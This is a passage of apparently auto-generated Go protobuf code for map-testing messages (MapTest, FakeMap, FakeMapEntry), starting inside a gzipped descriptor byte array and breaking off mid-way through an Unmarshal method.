0xd9, 0x03, 0x03, 0xe7, 0xac, 0x68, 0x8a, 0xdf, 0xe7, 0x14, 0x1c, 0xc3, 0x28, 0x4e, 0xe0, 0xd6,
0x3f, 0xe0, 0x14, 0x6e, 0xc0, 0x9f, 0x2f, 0x40, 0xc6, 0x32, 0x8d, 0x43, 0xcb, 0x9c, 0xc6, 0x88,
0x3f, 0x64, 0x0c, 0xc0, 0x20, 0x98, 0xe0, 0x1a, 0xa4, 0xa7, 0x5d, 0x88, 0x3f, 0x7a, 0x97, 0x6f,
0x0f, 0xbe, 0x02, 0x5b, 0xb0, 0xc0, 0x0f, 0x28, 0xdd, 0x32, 0xa7, 0xa0, 0xf8, 0x63, 0x46, 0x91,
0x0b, 0xc0, 0xd8, 0x34, 0x3c, 0xe4, 0x7a, 0x5d, 0x34, 0x0d, 0xc9, 0x1b, 0x7c, 0x1a, 0x0c, 0xc2,
0x5c, 0x79, 0x80, 0x4c, 0xad, 0x37, 0x1d, 0xc3, 0x57, 0xb9, 0x2b, 0x39, 0x06, 0x53, 0x54, 0x61,
0xbe, 0xaf, 0x3a, 0x6e, 0x4f, 0x35, 0xa6, 0x5a, 0x8e, 0x3f, 0x61, 0x1c, 0x59, 0x1f, 0xc4, 0x3c,
0x32, 0x30, 0x4f, 0x42, 0xf3, 0x35, 0xee, 0x91, 0x00, 0x8c, 0x6d, 0x3d, 0xd7, 0x23, 0xef, 0x59,
0x27, 0x61, 0xfb, 0x3a, 0xdf, 0x7a, 0x14, 0xbb, 0x13, 0x64, 0xbc, 0x06, 0x69, 0x57, 0xbf, 0x37,
0x15, 0xcd, 0x9f, 0xf2, 0x95, 0x26, 0x00, 0x0c, 0x7e, 0x09, 0xce, 0x4e, 0x4c, 0x13, 0x53, 0x90,
0xfd, 0x19, 0x23, 0x3b, 0x3d, 0x21, 0x55, 0xb0, 0x23, 0xe1, 0xa4, 0x94, 0x7f, 0xce, 0x8f, 0x04,
0x34, 0xc2, 0xd5, 0xc4, 0x17, 0x05, 0x57, 0xed, 0x9c, 0xcc, 0x6b, 0x7f, 0xc1, 0xbd, 0x46, 0xb1,
0x21, 0xaf, 0xed, 0xc1, 0x69, 0xc6, 0x78, 0xb2, 0x75, 0x7d, 0x93, 0x1f, 0xac, 0x14, 0xbd, 0x1f,
0x5e, 0xdd, 0x9f, 0x81, 0x15, 0xdf, 0x9d, 0xbc, 0x22, 0x75, 0x95, 0xbe, 0x6a, 0x4f, 0xc1, 0xfc,
0x0d, 0xc6, 0xcc, 0x4f, 0x7c, 0xbf, 0xa4, 0x75, 0x77, 0x54, 0x1b, 0x93, 0xdf, 0x84, 0x3c, 0x27,
0x1f, 0x98, 0x0e, 0xd2, 0xac, 0xae, 0xa9, 0xdf, 0x43, 0xed, 0x29, 0xa8, 0xff, 0x72, 0x64, 0xa9,
0xf6, 0x03, 0x70, 0xcc, 0x5c, 0x07, 0xd1, 0xaf, 0x55, 0x14, 0xbd, 0x6f, 0x5b, 0x8e, 0x17, 0xc1,
0xf8, 0x4d, 0xbe, 0x52, 0x3e, 0xae, 0x4e, 0x60, 0xe5, 0x1a, 0xe4, 0x48, 0x73, 0xda, 0x90, 0xfc,
0x2b, 0x46, 0x34, 0x3f, 0x44, 0xb1, 0x83, 0x43, 0xb3, 0xfa, 0xb6, 0xea, 0x4c, 0x73, 0xfe, 0xfd,
0x35, 0x3f, 0x38, 0x18, 0x84, 0x1d, 0x1c, 0xde, 0xa1, 0x8d, 0x70, 0xb6, 0x9f, 0x82, 0xe1, 0x5b,
0xfc, 0xe0, 0xe0, 0x18, 0x46, 0xc1, 0x0b, 0x86, 0x29, 0x28, 0xfe, 0x86, 0x53, 0x70, 0x0c, 0xa6,
0xf8, 0xcc, 0x30, 0xd1, 0x3a, 0xa8, 0xab, 0xbb, 0x9e, 0x43, 0xeb, 0xe0, 0x87, 0x53, 0x7d, 0xfb,
0xdd, 0x70, 0x11, 0x26, 0x07, 0xa0, 0xe5, 0x1b, 0xb0, 0x30, 0x52, 0x62, 0x48, 0x51, 0xdf, 0x7e,
0xe4, 0x7f, 0xfe, 0x7d, 0x76, 0x18, 0x85, 0x2b, 0x8c, 0xf2, 0x36, 0x5e, 0xf7, 0x70, 0x1d, 0x10,
0x4d, 0xf6, 0xca, 0xfb, 0xfe, 0xd2, 0x87, 0xca, 0x80, 0xf2, 0x75, 0x98, 0x0f, 0xd5, 0x00, 0xd1,
0x54, 0xbf, 0xc0, 0xa8, 0xb2, 0xc1, 0x12, 0xa0, 0x7c, 0x09, 0x12, 0x38, 0x9f, 0x47, 0xc3, 0x7f,
0x91, 0xc1, 0x89, 0x7a, 0xf9, 0x53, 0x90, 0xe2, 0x79, 0x3c, 0x1a, 0xfa, 0x4b, 0x0c, 0xea, 0x43,
0x30, 0x9c, 0xe7, 0xf0, 0x68, 0xf8, 0x2f, 0x73, 0x38, 0x87, 0x60, 0xf8, 0xf4, 0x2e, 0xfc, 0xfb,
0x5f, 0x49, 0xb0, 0x73, 0x98, 0xfb, 0xee, 0x1a, 0xcc, 0xb1, 0xe4, 0x1d, 0x8d, 0xfe, 0x02, 0x1b,
0x9c, 0x23, 0xca, 0xcf, 0x41, 0x72, 0x4a, 0x87, 0xff, 0x2a, 0x83, 0x52, 0xfd, 0x72, 0x15, 0x32,
0x81, 0x84, 0x1d, 0x0d, 0xff, 0x35, 0x06, 0x0f, 0xa2, 0xb0, 0xe9, 0x2c, 0x61, 0x47, 0x13, 0xfc,
0x3a, 0x37, 0x9d, 0x21, 0xb0, 0xdb, 0x78, 0xae, 0x8e, 0x46, 0xff, 0x06, 0xf7, 0x3a, 0x87, 0x94,
0x5f, 0x80, 0xb4, 0x7f, 0xfe, 0x46, 0xe3, 0x7f, 0x93, 0xe1, 0x87, 0x18, 0xec, 0x81, 0xc0, 0xf9,
0x1f, 0x4d, 0xf1, 0x5b, 0xdc, 0x03, 0x01, 0x14, 0xde, 0x46, 0xa3, 0x39, 0x3d, 0x9a, 0xe9, 0xb7,
0xf9, 0x36, 0x1a, 0x49, 0xe9, 0x78, 0x35, 0xc9, 0x31, 0x18, 0x4d, 0xf1, 0x3b, 0x7c, 0x35, 0x89,
0x3e, 0x36, 0x63, 0x34, 0x49, 0x46, 0x73, 0xfc, 0x2e, 0x37, 0x63, 0x24, 0x47, 0x96, 0x9b, 0x20,
0x8d, 0x27, 0xc8, 0x68, 0xbe, 0x2f, 0x32, 0xbe, 0xc5, 0xb1, 0xfc, 0x58, 0x7e, 0x11, 0x4e, 0x4f,
0x4e, 0x8e, 0xd1, 0xac, 0x5f, 0x7a, 0x7f, 0xe4, 0x3a, 0x13, 0xcc, 0x8d, 0xe5, 0xbd, 0xe1, 0x29,
0x1b, 0x4c, 0x8c, 0xd1, 0xb4, 0xaf, 0xbe, 0x1f, 0x3e, 0x68, 0x83, 0x79, 0xb1, 0x5c, 0x01, 0x18,
0xe6, 0xa4, 0x68, 0xae, 0xd7, 0x18, 0x57, 0x00, 0x84, 0xb7, 0x06, 0x4b, 0x49, 0xd1, 0xf8, 0x2f,
0xf3, 0xad, 0xc1, 0x10, 0x78, 0x6b, 0xf0, 0x6c, 0x14, 0x8d, 0x7e, 0x9d, 0x6f, 0x0d, 0x0e, 0x29,
0x5f, 0x83, 0x94, 0x39, 0x30, 0x0c, 0x1c, 0x5b, 0xd2, 0xc3, 0x3f, 0x67, 0xca, 0xff, 0xfb, 0x07,
0x0c, 0xcc, 0x01, 0xe5, 0x4b, 0x90, 0x44, 0xfd, 0x03, 0xd4, 0x8e, 0x42, 0xfe, 0xc7, 0x07, 0xfc,
0x3c, 0xc1, 0xda, 0xe5, 0x17, 0x00, 0xe8, 0x65, 0x9a, 0xfc, 0x4a, 0x14, 0x81, 0xfd, 0xcf, 0x0f,
0xd8, 0x97, 0x12, 0x43, 0xc8, 0x90, 0x80, 0x7e, 0x77, 0xf1, 0x70, 0x82, 0x77, 0xc3, 0x04, 0xe4,
0x02, 0x7e, 0x15, 0xe6, 0x6e, 0xb9, 0x96, 0xe9, 0xa9, 0xdd, 0x28, 0xf4, 0x7f, 0x31, 0x34, 0xd7,
0xc7, 0x0e, 0xeb, 0x5b, 0x0e, 0xf2, 0xd4, 0xae, 0x1b, 0x85, 0xfd, 0x6f, 0x86, 0xf5, 0x01, 0x18,
0xac, 0xa9, 0xae, 0x37, 0xcd, 0xbc, 0xff, 0x87, 0x83, 0x39, 0x00, 0x1b, 0x8d, 0xff, 0xbf, 0x8d,
0x0e, 0xa3, 0xb0, 0xef, 0x71, 0xa3, 0x99, 0x7e, 0xf9, 0x53, 0x90, 0xc6, 0xff, 0xd2, 0xaf, 0x87,
0x22, 0xc0, 0xff, 0xcb, 0xc0, 0x43, 0x04, 0x1e, 0xd9, 0xf5, 0xda, 0x9e, 0x1e, 0xed, 0xec, 0xff,
0x63, 0x2b, 0xcd, 0xf5, 0xcb, 0x15, 0xc8, 0xb8, 0x5e, 0xbb, 0x3d, 0x60, 0x15, 0x4d, 0x04, 0xfc,
0x07, 0x1f, 0xf8, 0x97, 0x5c, 0x1f, 0xb3, 0x71, 0x7e, 0xf2, 0x63, 0x1d, 0x6c, 0x59, 0x5b, 0x16,
0x7d, 0xa6, 0x83, 0x37, 0xe3, 0x70, 0x4a, 0xb3, 0xfa, 0x07, 0x96, 0xbb, 0x7e, 0x60, 0x79, 0xbd,
0xf5, 0xbe, 0x6a, 0xb3, 0xd7, 0xb5, 0x4c, 0x5f, 0xb5, 0xd9, 0x27, 0x80, 0xee, 0xca, 0xc9, 0x5e,
0xe6, 0x8a, 0x3f, 0x07, 0x73, 0x3b, 0xaa, 0xbd, 0x87, 0x5c, 0x4f, 0x22, 0x1e, 0x20, 0x1f, 0xcb,
0xb0, 0xb7, 0xce, 0xd5, 0x52, 0x80, 0xb8, 0xc4, 0xd4, 0x4a, 0x2d, 0xcf, 0x69, 0x79, 0x0e, 0xf9,
0x5d, 0x58, 0x9e, 0x75, 0x49, 0x63, 0xe5, 0x2a, 0x64, 0x02, 0x62, 0x49, 0x84, 0xf8, 0x6d, 0x74,
0xc8, 0x3e, 0x97, 0xc1, 0xff, 0x4a, 0xcb, 0xc3, 0xcf, 0xc1, 0xb0, 0x8c, 0x36, 0xca, 0xb1, 0x2b,
0x42, 0xf1, 0x79, 0x98, 0xbb, 0xae, 0xde, 0x46, 0x3b, 0xaa, 0x2d, 0x5d, 0x84, 0x39, 0x64, 0x7a,
0x8e, 0x8e, 0x5c, 0x66, 0xc0, 0xd9, 0x90, 0x01, 0x4c, 0x8d, 0x8e, 0xcc, 0x35, 0x8b, 0xdb, 0x90,
0x0d, 0x76, 0x4c, 0x3b, 0x36, 0x96, 0x5a, 0x5e, 0x8f, 0x7d, 0x1e, 0x9a, 0x96, 0x69, 0x63, 0x63,
0xf3, 0xad, 0x07, 0x85, 0x99, 0xef, 0x3e, 0x28, 0xcc, 0xfc, 0xf3, 0x83, 0xc2, 0xcc, 0xdb, 0x0f,
0x0a, 0xc2, 0x7b, 0x0f, 0x0a, 0xc2, 0x0f, 0x1f, 0x14, 0x84, 0xfb, 0x47, 0x05, 0xe1, 0xab, 0x47,
0x05, 0xe1, 0xcd, 0xa3, 0x82, 0xf0, 0xed, 0xa3, 0x82, 0xf0, 0xd6, 0x51, 0x41, 0xf8, 0xee, 0x51,
0x41, 0x78, 0xfb, 0xa8, 0x20, 0x7c, 0xff, 0xa8, 0x30, 0xf3, 0xde, 0x51, 0x41, 0xf8, 0xe1, 0x51,
0x61, 0xe6, 0xfe, 0xbf, 0x16, 0x66, 0x0e, 0x66, 0x89, 0x6f, 0x2f, 0xfe, 0x7f, 0x00, 0x00, 0x00,
0xff, 0xff, 0x13, 0x16, 0x92, 0xfd, 0x57, 0x31, 0x00, 0x00,
}
r := bytes.NewReader(gzipped)
gzipr, err := compress_gzip.NewReader(r)
if err != nil {
panic(err)
}
ungzipped, err := io_ioutil.ReadAll(gzipr)
if err != nil {
panic(err)
}
if err := github_com_gogo_protobuf_proto.Unmarshal(ungzipped, d); err != nil {
panic(err)
}
return d
}
func (this *MapTest) VerboseEqual(that interface{}) error {
if that == nil {
if this == nil {
return nil
}
return fmt.Errorf("that == nil && this != nil")
}
that1, ok := that.(*MapTest)
if !ok {
that2, ok := that.(MapTest)
if ok {
that1 = &that2
} else {
return fmt.Errorf("that is not of type *MapTest")
}
}
if that1 == nil {
if this == nil {
return nil
}
return fmt.Errorf("that is type *MapTest but is nil && this != nil")
} else if this == nil {
return fmt.Errorf("that is type *MapTest but is not nil && this == nil")
}
if len(this.StrStr) != len(that1.StrStr) {
return fmt.Errorf("StrStr this(%v) Not Equal that(%v)", len(this.StrStr), len(that1.StrStr))
}
for i := range this.StrStr {
if this.StrStr[i] != that1.StrStr[i] {
return fmt.Errorf("StrStr this[%v](%v) Not Equal that[%v](%v)", i, this.StrStr[i], i, that1.StrStr[i])
}
}
return nil
}
func (this *MapTest) Equal(that interface{}) bool {
if that == nil {
if this == nil {
return true
}
return false
}
that1, ok := that.(*MapTest)
if !ok {
that2, ok := that.(MapTest)
if ok {
that1 = &that2
} else {
return false
}
}
if that1 == nil {
if this == nil {
return true
}
return false
} else if this == nil {
return false
}
if len(this.StrStr) != len(that1.StrStr) {
return false
}
for i := range this.StrStr {
if this.StrStr[i] != that1.StrStr[i] {
return false
}
}
return true
}
func (this *FakeMap) VerboseEqual(that interface{}) error {
if that == nil {
if this == nil {
return nil
}
return fmt.Errorf("that == nil && this != nil")
}
that1, ok := that.(*FakeMap)
if !ok {
that2, ok := that.(FakeMap)
if ok {
that1 = &that2
} else {
return fmt.Errorf("that is not of type *FakeMap")
}
}
if that1 == nil {
if this == nil {
return nil
}
return fmt.Errorf("that is type *FakeMap but is nil && this != nil")
} else if this == nil {
return fmt.Errorf("that is type *FakeMap but is not nil && this == nil")
}
if len(this.Entries) != len(that1.Entries) {
return fmt.Errorf("Entries this(%v) Not Equal that(%v)", len(this.Entries), len(that1.Entries))
}
for i := range this.Entries {
if !this.Entries[i].Equal(that1.Entries[i]) {
return fmt.Errorf("Entries this[%v](%v) Not Equal that[%v](%v)", i, this.Entries[i], i, that1.Entries[i])
}
}
return nil
}
func (this *FakeMap) Equal(that interface{}) bool {
if that == nil {
if this == nil {
return true
}
return false
}
that1, ok := that.(*FakeMap)
if !ok {
that2, ok := that.(FakeMap)
if ok {
that1 = &that2
} else {
return false
}
}
if that1 == nil {
if this == nil {
return true
}
return false
} else if this == nil {
return false
}
if len(this.Entries) != len(that1.Entries) {
return false
}
for i := range this.Entries {
if !this.Entries[i].Equal(that1.Entries[i]) {
return false
}
}
return true
}
func (this *FakeMapEntry) VerboseEqual(that interface{}) error {
if that == nil {
if this == nil {
return nil
}
return fmt.Errorf("that == nil && this != nil")
}
that1, ok := that.(*FakeMapEntry)
if !ok {
that2, ok := that.(FakeMapEntry)
if ok {
that1 = &that2
} else {
return fmt.Errorf("that is not of type *FakeMapEntry")
}
}
if that1 == nil {
if this == nil {
return nil
}
return fmt.Errorf("that is type *FakeMapEntry but is nil && this != nil")
} else if this == nil {
return fmt.Errorf("that is type *FakeMapEntry but is not nil && this == nil")
}
if this.Key != that1.Key {
return fmt.Errorf("Key this(%v) Not Equal that(%v)", this.Key, that1.Key)
}
if this.Value != that1.Value {
return fmt.Errorf("Value this(%v) Not Equal that(%v)", this.Value, that1.Value)
}
if this.Other != that1.Other {
return fmt.Errorf("Other this(%v) Not Equal that(%v)", this.Other, that1.Other)
}
return nil
}
func (this *FakeMapEntry) Equal(that interface{}) bool {
if that == nil {
if this == nil {
return true
}
return false
}
that1, ok := that.(*FakeMapEntry)
if !ok {
that2, ok := that.(FakeMapEntry)
if ok {
that1 = &that2
} else {
return false
}
}
if that1 == nil {
if this == nil {
return true
}
return false
} else if this == nil {
return false
}
if this.Key != that1.Key {
return false
}
if this.Value != that1.Value {
return false
}
if this.Other != that1.Other {
return false
}
return true
}
func (this *MapTest) GoString() string {
if this == nil {
return "nil"
}
s := make([]string, 0, 5)
s = append(s, "&mapdefaults.MapTest{")
keysForStrStr := make([]string, 0, len(this.StrStr))
for k := range this.StrStr {
keysForStrStr = append(keysForStrStr, k)
}
github_com_gogo_protobuf_sortkeys.Strings(keysForStrStr)
mapStringForStrStr := "map[string]string{"
for _, k := range keysForStrStr {
mapStringForStrStr += fmt.Sprintf("%#v: %#v,", k, this.StrStr[k])
}
mapStringForStrStr += "}"
if this.StrStr != nil {
s = append(s, "StrStr: "+mapStringForStrStr+",\n")
}
s = append(s, "}")
return strings.Join(s, "")
}
func (this *FakeMap) GoString() string {
if this == nil {
return "nil"
}
s := make([]string, 0, 5)
s = append(s, "&mapdefaults.FakeMap{")
if this.Entries != nil {
s = append(s, "Entries: "+fmt.Sprintf("%#v", this.Entries)+",\n")
}
s = append(s, "}")
return strings.Join(s, "")
}
func (this *FakeMapEntry) GoString() string {
if this == nil {
return "nil"
}
s := make([]string, 0, 7)
s = append(s, "&mapdefaults.FakeMapEntry{")
s = append(s, "Key: "+fmt.Sprintf("%#v", this.Key)+",\n")
s = append(s, "Value: "+fmt.Sprintf("%#v", this.Value)+",\n")
s = append(s, "Other: "+fmt.Sprintf("%#v", this.Other)+",\n")
s = append(s, "}")
return strings.Join(s, "")
}
func valueToGoStringMap(v interface{}, typ string) string {
rv := reflect.ValueOf(v)
if rv.IsNil() {
return "nil"
}
pv := reflect.Indirect(rv).Interface()
return fmt.Sprintf("func(v %v) *%v { return &v } ( %#v )", typ, typ, pv)
}
func (m *MapTest) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *MapTest) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.StrStr) > 0 {
for k := range m.StrStr {
dAtA[i] = 0xa
i++
v := m.StrStr[k]
mapSize := 1 + len(k) + sovMap(uint64(len(k))) + 1 + len(v) + sovMap(uint64(len(v)))
i = encodeVarintMap(dAtA, i, uint64(mapSize))
dAtA[i] = 0xa
i++
i = encodeVarintMap(dAtA, i, uint64(len(k)))
i += copy(dAtA[i:], k)
dAtA[i] = 0x12
i++
i = encodeVarintMap(dAtA, i, uint64(len(v)))
i += copy(dAtA[i:], v)
}
}
return i, nil
}
func (m *FakeMap) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *FakeMap) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.Entries) > 0 {
for _, msg := range m.Entries {
dAtA[i] = 0xa
i++
i = encodeVarintMap(dAtA, i, uint64(msg.Size()))
n, err := msg.MarshalTo(dAtA[i:])
if err != nil {
return 0, err
}
i += n
}
}
return i, nil
}
func (m *FakeMapEntry) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *FakeMapEntry) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.Key) > 0 {
dAtA[i] = 0xa
i++
i = encodeVarintMap(dAtA, i, uint64(len(m.Key)))
i += copy(dAtA[i:], m.Key)
}
if len(m.Value) > 0 {
dAtA[i] = 0x12
i++
i = encodeVarintMap(dAtA, i, uint64(len(m.Value)))
i += copy(dAtA[i:], m.Value)
}
if len(m.Other) > 0 {
dAtA[i] = 0x1a
i++
i = encodeVarintMap(dAtA, i, uint64(len(m.Other)))
i += copy(dAtA[i:], m.Other)
}
return i, nil
}
func encodeVarintMap(dAtA []byte, offset int, v uint64) int {
for v >= 1<<7 {
dAtA[offset] = uint8(v&0x7f | 0x80)
v >>= 7
offset++
}
dAtA[offset] = uint8(v)
return offset + 1
}
func NewPopulatedMapTest(r randyMap, easy bool) *MapTest {
this := &MapTest{}
if r.Intn(10) != 0 {
v1 := r.Intn(10)
this.StrStr = make(map[string]string)
for i := 0; i < v1; i++ {
this.StrStr[randStringMap(r)] = randStringMap(r)
}
}
if !easy && r.Intn(10) != 0 {
}
return this
}
func NewPopulatedFakeMap(r randyMap, easy bool) *FakeMap {
this := &FakeMap{}
if r.Intn(10) != 0 {
v2 := r.Intn(5)
this.Entries = make([]*FakeMapEntry, v2)
for i := 0; i < v2; i++ {
this.Entries[i] = NewPopulatedFakeMapEntry(r, easy)
}
}
if !easy && r.Intn(10) != 0 {
}
return this
}
func NewPopulatedFakeMapEntry(r randyMap, easy bool) *FakeMapEntry {
this := &FakeMapEntry{}
this.Key = string(randStringMap(r))
this.Value = string(randStringMap(r))
this.Other = string(randStringMap(r))
if !easy && r.Intn(10) != 0 {
}
return this
}
type randyMap interface {
Float32() float32
Float64() float64
Int63() int64
Int31() int32
Uint32() uint32
Intn(n int) int
}
func randUTF8RuneMap(r randyMap) rune {
ru := r.Intn(62)
if ru < 10 {
return rune(ru + 48)
} else if ru < 36 {
return rune(ru + 55)
}
return rune(ru + 61)
}
func randStringMap(r randyMap) string {
v3 := r.Intn(100)
tmps := make([]rune, v3)
for i := 0; i < v3; i++ {
tmps[i] = randUTF8RuneMap(r)
}
return string(tmps)
}
func randUnrecognizedMap(r randyMap, maxFieldNumber int) (dAtA []byte) {
l := r.Intn(5)
for i := 0; i < l; i++ {
wire := r.Intn(4)
if wire == 3 {
wire = 5
}
fieldNumber := maxFieldNumber + r.Intn(100)
dAtA = randFieldMap(dAtA, r, fieldNumber, wire)
}
return dAtA
}
func randFieldMap(dAtA []byte, r randyMap, fieldNumber int, wire int) []byte {
key := uint32(fieldNumber)<<3 | uint32(wire)
switch wire {
case 0:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
v4 := r.Int63()
if r.Intn(2) == 0 {
v4 *= -1
}
dAtA = encodeVarintPopulateMap(dAtA, uint64(v4))
case 1:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
dAtA = append(dAtA, byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)))
case 2:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
ll := r.Intn(100)
dAtA = encodeVarintPopulateMap(dAtA, uint64(ll))
for j := 0; j < ll; j++ {
dAtA = append(dAtA, byte(r.Intn(256)))
}
default:
dAtA = encodeVarintPopulateMap(dAtA, uint64(key))
dAtA = append(dAtA, byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)), byte(r.Intn(256)))
}
return dAtA
}
func encodeVarintPopulateMap(dAtA []byte, v uint64) []byte {
for v >= 1<<7 {
dAtA = append(dAtA, uint8(uint64(v)&0x7f|0x80))
v >>= 7
}
dAtA = append(dAtA, uint8(v))
return dAtA
}
func (m *MapTest) Size() (n int) {
var l int
_ = l
if len(m.StrStr) > 0 {
for k, v := range m.StrStr {
_ = k
_ = v
mapEntrySize := 1 + len(k) + sovMap(uint64(len(k))) + 1 + len(v) + sovMap(uint64(len(v)))
n += mapEntrySize + 1 + sovMap(uint64(mapEntrySize))
}
}
return n
}
func (m *FakeMap) Size() (n int) {
var l int
_ = l
if len(m.Entries) > 0 {
for _, e := range m.Entries {
l = e.Size()
n += 1 + l + sovMap(uint64(l))
}
}
return n
}
func (m *FakeMapEntry) Size() (n int) {
var l int
_ = l
l = len(m.Key)
if l > 0 {
n += 1 + l + sovMap(uint64(l))
}
l = len(m.Value)
if l > 0 {
n += 1 + l + sovMap(uint64(l))
}
l = len(m.Other)
if l > 0 {
n += 1 + l + sovMap(uint64(l))
}
return n
}
func sovMap(x uint64) (n int) {
for {
n++
x >>= 7
if x == 0 {
break
}
}
return n
}
func sozMap(x uint64) (n int) {
return sovMap(uint64((x << 1) ^ uint64((int64(x) >> 63))))
}
func (this *MapTest) String() string {
if this == nil {
return "nil"
}
keysForStrStr := make([]string, 0, len(this.StrStr))
for k := range this.StrStr {
keysForStrStr = append(keysForStrStr, k)
}
github_com_gogo_protobuf_sortkeys.Strings(keysForStrStr)
mapStringForStrStr := "map[string]string{"
for _, k := range keysForStrStr {
mapStringForStrStr += fmt.Sprintf("%v: %v,", k, this.StrStr[k])
}
mapStringForStrStr += "}"
s := strings.Join([]string{`&MapTest{`,
`StrStr:` + mapStringForStrStr + `,`,
`}`,
}, "")
return s
}
func (this *FakeMap) String() string {
if this == nil {
return "nil"
}
s := strings.Join([]string{`&FakeMap{`,
`Entries:` + strings.Replace(fmt.Sprintf("%v", this.Entries), "FakeMapEntry", "FakeMapEntry", 1) + `,`,
`}`,
}, "")
return s
}
func (this *FakeMapEntry) String() string {
if this == nil {
return "nil"
}
s := strings.Join([]string{`&FakeMapEntry{`,
`Key:` + fmt.Sprintf("%v", this.Key) + `,`,
`Value:` + fmt.Sprintf("%v", this.Value) + `,`,
`Other:` + fmt.Sprintf("%v", this.Other) + `,`,
`}`,
}, "")
return s
}
func valueToStringMap(v interface{}) string {
rv := reflect.ValueOf(v)
if rv.IsNil() {
return "nil"
}
pv := reflect.Indirect(rv).Interface()
return fmt.Sprintf("*%v", pv)
}
func (m *MapTest) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: MapTest: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: MapTest: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field StrStr", wireType)
}
var msglen int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
msglen |= (int(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
if msglen < 0 {
return ErrInvalidLengthMap
}
postIndex := iNdEx + msglen
if postIndex > l {
return io.ErrUnexpectedEOF
}
if m.StrStr == nil {
m.StrStr = make(map[string]string)
}
var mapkey string
var mapvalue string
for iNdEx < postIndex {
entryPreIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
if fieldNum == 1 {
var stringLenmapkey uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLenmapkey |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLenmapkey := int(stringLenmapkey)
if intStringLenmapkey < 0 {
return ErrInvalidLengthMap
}
postStringIndexmapkey := iNdEx + intStringLenmapkey
if postStringIndexmapkey > l {
return io.ErrUnexpectedEOF
}
mapkey = string(dAtA[iNdEx:postStringIndexmapkey])
iNdEx = postStringIndexmapkey
} else if fieldNum == 2 {
var stringLenmapvalue uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLenmapvalue |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLenmapvalue := int(stringLenmapvalue)
if intStringLenmapvalue < 0 {
return ErrInvalidLengthMap
}
postStringIndexmapvalue := iNdEx + intStringLenmapvalue
if postStringIndexmapvalue > l {
return io.ErrUnexpectedEOF
}
mapvalue = string(dAtA[iNdEx:postStringIndexmapvalue])
iNdEx = postStringIndexmapvalue
} else {
iNdEx = entryPreIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > postIndex {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
m.StrStr[mapkey] = mapvalue
iNdEx = postIndex
default:
iNdEx = preIndex
skippy, err := skipMap(dAtA[iNdEx:])
if err != nil {
return err
}
if skippy < 0 {
return ErrInvalidLengthMap
}
if (iNdEx + skippy) > l {
return io.ErrUnexpectedEOF
}
iNdEx += skippy
}
}
if iNdEx > l {
return io.ErrUnexpectedEOF
}
return nil
}
func (m *FakeMap) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: FakeMap: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: FakeMap: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Entries", wireType)
}
var msglen int
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowMap
}
if iNdEx >= l {
